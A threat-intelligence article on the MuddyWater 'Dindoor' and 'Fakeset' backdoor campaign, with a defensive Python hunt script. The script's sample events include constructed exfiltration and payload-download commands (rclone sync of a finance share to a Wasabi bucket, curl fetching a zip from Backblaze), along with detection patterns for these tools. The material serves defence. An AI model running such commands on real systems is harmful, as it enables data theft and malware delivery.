MuddyWater's Latest Hack: Uncovering the 'Dindoor' Backdoor Campaign
In a recent series of attacks, the Iranian hacking group MuddyWater has targeted organizations in the United States and elsewhere, and security teams are still working to establish the scope of the intrusions and prevent further exploitation. The campaign began in early February and is ongoing, with multiple organizations reporting suspicious activity on their networks.
The Threat Hunter Team at Broadcom's Symantec and Carbon Black detected the campaign and identified a previously unknown backdoor, dubbed 'Dindoor'. The backdoor is signed with a code-signing certificate issued to "Amy Cherne" and is built on Deno, a JavaScript and TypeScript runtime, which it uses to execute malicious code on compromised networks. The researchers also observed an attempt to exfiltrate data from one of the targeted companies to a Wasabi cloud storage bucket using Rclone, a command-line tool for copying and syncing files to cloud storage.
The 'Dindoor' Backdoor: A Reused Certificate Ties It to MuddyWater
Dindoor was found on the networks of multiple organizations, including the Israeli office of a US software company that supplies the defense and aerospace sectors, a US bank, and a Canadian non-profit organization. The striking detail is the code-signing certificates. The "Amy Cherne" certificate on Dindoor also appears on the Fakeset backdoor described below, alongside a certificate issued to "Donald Gay", and the Donald Gay certificate has been linked to malware samples associated with MuddyWater since 2017. A reused signing certificate is a strong pivot for hunting related samples, though on its own it is supporting evidence for attribution rather than proof.
Together with the overlap in tooling, the certificate reuse ties the Dindoor campaign to MuddyWater, also tracked as Seedworm, TEMP.Zagros, and Static Kitten. The group has been active since 2017 and is assessed to be associated with Iran's Ministry of Intelligence and Security (MOIS). Other malware attributed to MuddyWater by security vendors such as Google, Microsoft, and Kaspersky includes Stagecomp and Darkcomp.
Malware Ties: Unpacking the 'Fakeset' Backdoor
A second backdoor, Fakeset, was discovered on the network of a US airport. It is signed with certificates issued to "Amy Cherne" and "Donald Gay" and uses Python to execute malicious code on compromised systems. As noted above, the Donald Gay certificate has previously been linked to malware samples associated with MuddyWater.
Fakeset was downloaded from two servers belonging to the cloud storage provider Backblaze. Researchers also observed an attempt to exfiltrate data with Rclone to a Wasabi cloud storage bucket, although it is unclear whether the attempt succeeded. The reuse of the certificates seen on Dindoor indicates that MuddyWater was behind this intrusion as well.
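The behaviours described for Dindoor and Fakeset (binaries signed with the "Amy Cherne" and "Donald Gay" certificates, Deno and Python runtimes executing from user-writable paths, payloads fetched from Backblaze, and Rclone pushing data to Wasabi) are all visible in ordinary process-creation telemetry. The following hunt script is an added example, not code from Symantec's report or from the threat actor: it applies four rules to a handful of constructed events. The event schema, the cloud endpoint hostname patterns (wasabisys.com, backblazeb2.com) and the sample command lines are assumptions for the example; only the signer names and the tools come from the page.

```python
import re
from dataclasses import dataclass

# Certificate subject names reported on the page. They are hunt pivots, not proof on their own.
SUSPECT_SIGNERS = {"amy cherne", "donald gay"}

# Bucket/endpoint hostnames for the two storage providers named on the page.
# The patterns are an assumption for this example; extend them from your own telemetry.
CLOUD_HOSTS = re.compile(r"[\w.-]*\b(?:wasabisys\.com|backblazeb2\.com)\b", re.I)

# An rclone remote looks like "name:path"; a Windows drive letter ("C:\...") must not count.
RCLONE_REMOTE = re.compile(r'^"?([A-Za-z][\w-]*):(?![\\/])')
RCLONE_TRANSFER_VERBS = {"copy", "sync", "move", "copyto", "moveto"}

INTERPRETERS = {"deno.exe", "deno", "python.exe", "pythonw.exe", "python", "python3"}
DOWNLOADERS = {"curl.exe", "curl", "wget", "powershell.exe", "pwsh.exe", "bitsadmin.exe", "certutil.exe"}
USER_WRITABLE = ("\\temp\\", "\\appdata\\", "\\programdata\\", "\\users\\public\\", "/tmp/", "/dev/shm/")


@dataclass(frozen=True)
class Event:
    """One process-creation record (constructed fields, not a vendor schema)."""
    host: str
    image: str        # full path of the launched binary
    cmdline: str
    signer: str = ""  # Authenticode subject CN as reported by the sensor, if any


@dataclass(frozen=True)
class Finding:
    host: str
    rule: str
    detail: str


def _exe_name(image: str) -> str:
    return image.replace("\\", "/").rsplit("/", 1)[-1].lower()


def check_event(ev: Event) -> list[Finding]:
    """Apply the four hunt rules to one event; returns zero or more findings."""
    out = []
    exe = _exe_name(ev.image)
    argv = ev.cmdline.split()
    image_lc = ev.image.lower()

    # 1. Reused code-signing certificate: the pivot that tied Dindoor and Fakeset together.
    if ev.signer.strip().lower() in SUSPECT_SIGNERS:
        out.append(Finding(ev.host, "reused_signer", f"{exe} signed by '{ev.signer}'"))

    # 2. rclone pushing a local tree to a remote (cloud-storage exfiltration).
    if exe.startswith("rclone"):
        verb = next((a.lower() for a in argv[1:] if a.lower() in RCLONE_TRANSFER_VERBS), None)
        remotes = [a for a in argv[1:] if RCLONE_REMOTE.match(a)]
        if verb and (remotes or CLOUD_HOSTS.search(ev.cmdline)):
            dest = remotes[-1] if remotes else "configured remote"
            out.append(Finding(ev.host, "rclone_exfil", f"rclone {verb} -> {dest}"))

    # 3. Script runtime (Deno, Python) executing from a user-writable location.
    if exe in INTERPRETERS and any(d in image_lc for d in USER_WRITABLE):
        out.append(Finding(ev.host, "interpreter_user_writable", f"{exe} from {ev.image}"))

    # 4. Payload retrieval from a cloud-storage bucket with a stock download tool.
    if exe in DOWNLOADERS:
        m = CLOUD_HOSTS.search(ev.cmdline)
        if m:
            out.append(Finding(ev.host, "cloud_download", f"{exe} fetched from {m.group(0)}"))
    return out


def hunt(events: list[Event]) -> list[Finding]:
    return [f for ev in events for f in check_event(ev)]


# Constructed sample telemetry (not real logs) mirroring the behaviours described on the page.
SAMPLE_EVENTS = [
    Event("WS-0142", r"C:\Users\Public\rc\rclone.exe",
          r'rclone.exe sync "C:\Shares\Finance" wasabi:bkt-0217 --s3-endpoint s3.wasabisys.com --transfers 16'),
    Event("WS-0142", r"C:\Users\jdoe\AppData\Local\Temp\deno.exe",
          r"deno.exe run -A --no-prompt C:\Users\jdoe\AppData\Local\Temp\svc.ts", signer="Amy Cherne"),
    Event("WS-0142", r"C:\Windows\System32\curl.exe",
          r"curl.exe -o C:\ProgramData\u.zip https://f002.backblazeb2.com/file/pub-x/u.zip"),
    Event("DEV-07", r"C:\Program Files\Python311\python.exe",
          "python.exe build.py", signer="Python Software Foundation"),
    Event("DEV-07", r"C:\Program Files\rclone\rclone.exe", "rclone.exe version"),
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"{f.host:8} {f.rule:26} {f.detail}")
```

Run against the constructed events, the script flags the rclone sync to the Wasabi remote, the Deno binary signed by "Amy Cherne" running from a Temp directory (two findings for one event), and the curl download from Backblaze, while the developer workstation's legitimate Python and `rclone version` produce nothing. Rule 2 deliberately keys on the `name:path` remote syntax rather than the endpoint hostname, because a pre-configured rclone.conf keeps the endpoint off the command line; rule 4 is the noisy one and should be scoped to providers the organization does not legitimately use.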
The Implications: Preventing Future Attacks
The Threat Hunter Team warned: "While we have disrupted these breaches, other organizations could still be vulnerable to attack." Defenders can act directly on the TTPs described here: alert on Rclone and similar sync tools transferring data to cloud storage endpoints such as Wasabi and Backblaze that the organization does not itself use, review any executables signed by the "Amy Cherne" and "Donald Gay" certificates, and treat Deno and Python runtimes running from user-writable locations as suspicious. These checks complement baseline measures such as continuous network monitoring, timely patching, and security awareness training for staff.
In conclusion, MuddyWater's latest campaign highlights the ongoing threat posed by Iranian hacking groups and the importance of staying informed about emerging threats. By understanding the tactics, techniques, and procedures (TTPs) used by these groups, organizations can better protect themselves against similar attacks in the future.
Keywords: #MuddyWater #IranianHackingGroup #DindoorBackdoor #Cybersecurity #DataBreach #Malware #Vulnerability #NetworkSecurity